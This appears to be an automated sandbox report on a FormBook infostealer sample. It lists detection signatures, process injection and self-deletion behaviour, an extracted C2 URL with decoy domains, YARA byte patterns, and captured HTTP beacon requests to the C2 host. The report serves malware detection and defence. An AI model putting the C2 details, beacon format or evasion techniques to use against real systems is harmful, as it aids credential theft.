Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 5SXTKXCnqS

Overview

General Information

Sample Name:5SXTKXCnqS (renamed file extension from none to exe)
Analysis ID:432719
MD5:cb4947e5c78ada624d22c28ee9079871
SHA1:eb2c2d329e9be0b3a74582a4fd9c257bc795a690
SHA256:02230fb80db0fe0055730a0af8b3a0c66a578b2c315206053b80bae250c5561d
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5SXTKXCnqS.exe (PID: 5828 cmdline: 'C:\Users\user\Desktop\5SXTKXCnqS.exe' MD5: CB4947E5C78ADA624D22C28EE9079871)
    • 5SXTKXCnqS.exe (PID: 4328 cmdline: 'C:\Users\user\Desktop\5SXTKXCnqS.exe' MD5: CB4947E5C78ADA624D22C28EE9079871)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 4940 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 1384 cmdline: /c del 'C:\Users\user\Desktop\5SXTKXCnqS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.updatesz.com/hlx/"], "decoy": ["firo.store", "unmeasured-grace.com", "burger-ff.com", "alcargomoversllc.com", "brianratkevich.com", "semugaralara01.net", "ngalvision.com", "texaslearningpods.com", "ontarioboatcharters.com", "kleinrugcleaning.com", "michaelvancebromfield.com", "habitameya.com", "elyoma.com", "worldtvepisode.com", "masatakahorie.com", "jumpinginfo.com", "hfjxhs.com", "bf-swiss.com", "rvingbus.com", "suxfi.com", "schoolcardtrades.com", "motion-airsoft.com", "123netflix.moe", "ic200mdl750.com", "silkensarees.com", "digitalmarketingtraining.xyz", "foypay.com", "eudoraacantik.com", "healthyandwealthie.com", "print-postcards-fast.com", "alpha-psych.com", "merthyrrock.com", "mss52.com", "cddcsw.com", "istanbulbisiklettamircisi.com", "ertugrulbey.net", "katarina-yoga.com", "findholmesinlaurelmaryland.com", "sabciu.net", "shipthuocnhanh24h.com", "veganonthegreens.com", "ailil-alvarez.com", "thefashionszone.com", "geminicomputerofficial.com", "terraveda.net", "ruhstorfer-gruppe.info", "suderstr.com", "yunjichem.com", "priyadubai.com", "sofierceboutique.com", "nealcurtiss.com", "mcgdinner.com", "steplife.info", "pwagih.com", "cpzgzcw.com", "wierzewzwierze.com", "asbestosconsultancyservices.com", "centerstageacademyaz.com", "skip1-dndasasd.com", "successteamrealty.com", "mijninboxe.com", "berkeleyrehab.com", "tfjxw.com", "mcluxuryrentals.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.5SXTKXCnqS.exe.2170000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.5SXTKXCnqS.exe.2170000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.5SXTKXCnqS.exe.2170000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        0.2.5SXTKXCnqS.exe.2170000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.5SXTKXCnqS.exe.2170000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 4940

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.updatesz.com/hlx/"], "decoy": ["firo.store", "unmeasured-grace.com", "burger-ff.com", "alcargomoversllc.com", "brianratkevich.com", "semugaralara01.net", "ngalvision.com", "texaslearningpods.com", "ontarioboatcharters.com", "kleinrugcleaning.com", "michaelvancebromfield.com", "habitameya.com", "elyoma.com", "worldtvepisode.com", "masatakahorie.com", "jumpinginfo.com", "hfjxhs.com", "bf-swiss.com", "rvingbus.com", "suxfi.com", "schoolcardtrades.com", "motion-airsoft.com", "123netflix.moe", "ic200mdl750.com", "silkensarees.com", "digitalmarketingtraining.xyz", "foypay.com", "eudoraacantik.com", "healthyandwealthie.com", "print-postcards-fast.com", "alpha-psych.com", "merthyrrock.com", "mss52.com", "cddcsw.com", "istanbulbisiklettamircisi.com", "ertugrulbey.net", "katarina-yoga.com", "findholmesinlaurelmaryland.com", "sabciu.net", "shipthuocnhanh24h.com", "veganonthegreens.com", "ailil-alvarez.com", "thefashionszone.com", "geminicomputerofficial.com", "terraveda.net", "ruhstorfer-gruppe.info", "suderstr.com", "yunjichem.com", "priyadubai.com", "sofierceboutique.com", "nealcurtiss.com", "mcgdinner.com", "steplife.info", "pwagih.com", "cpzgzcw.com", "wierzewzwierze.com", "asbestosconsultancyservices.com", "centerstageacademyaz.com", "skip1-dndasasd.com", "successteamrealty.com", "mijninboxe.com", "berkeleyrehab.com", "tfjxw.com", "mcluxuryrentals.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 5SXTKXCnqS.exeVirustotal: Detection: 30%Perma Link
          Source: 5SXTKXCnqS.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 5SXTKXCnqS.exeJoe Sandbox ML: detected
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.5SXTKXCnqS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.msdt.exe.b552b0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.5SXTKXCnqS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.msdt.exe.509f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5SXTKXCnqS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.288397745.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: 5SXTKXCnqS.exe, 00000002.00000002.315714674.0000000002A80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5SXTKXCnqS.exe, 00000000.00000003.236649402.0000000009AA0000.00000004.00000001.sdmp, 5SXTKXCnqS.exe, 00000002.00000003.237181560.0000000000660000.00000004.00000001.sdmp, msdt.exe, 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5SXTKXCnqS.exe, msdt.exe
          Source: Binary string: msdt.pdb source: 5SXTKXCnqS.exe, 00000002.00000002.315714674.0000000002A80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.288397745.0000000006FE0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\AppData\Local\Temp\wkxohdeyqvvyrJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\AppData\Local\Temp\02vqprgl0atfidcJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsaC26D.tmpJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\Desktop\5SXTKXCnqS.exeJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 4x nop then pop edi2_2_00417D6E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi14_2_00737D6E

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.updatesz.com/hlx/
          Source: global trafficHTTP traffic detected: GET /hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr HTTP/1.1Host: www.centerstageacademyaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hlx/?wVSH=1q0nvnuESuCKkKkbLudmlC1kRF8eq+dUTLEJwYL638OOvnGjESXIW61pqUjqlD08HWSv&i0D=adKPlr HTTP/1.1Host: www.updatesz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: global trafficHTTP traffic detected: GET /hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr HTTP/1.1Host: www.centerstageacademyaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hlx/?wVSH=1q0nvnuESuCKkKkbLudmlC1kRF8eq+dUTLEJwYL638OOvnGjESXIW61pqUjqlD08HWSv&i0D=adKPlr HTTP/1.1Host: www.updatesz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.centerstageacademyaz.com
          Source: msdt.exe, 0000000E.00000002.501612375.000000000558F000.00000004.00000001.sdmpString found in binary or memory: http://centerstage.academy/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDq
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 5SXTKXCnqS.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 5SXTKXCnqS.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042
          Source: 5SXTKXCnqS.exe, 00000000.00000002.240155018.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
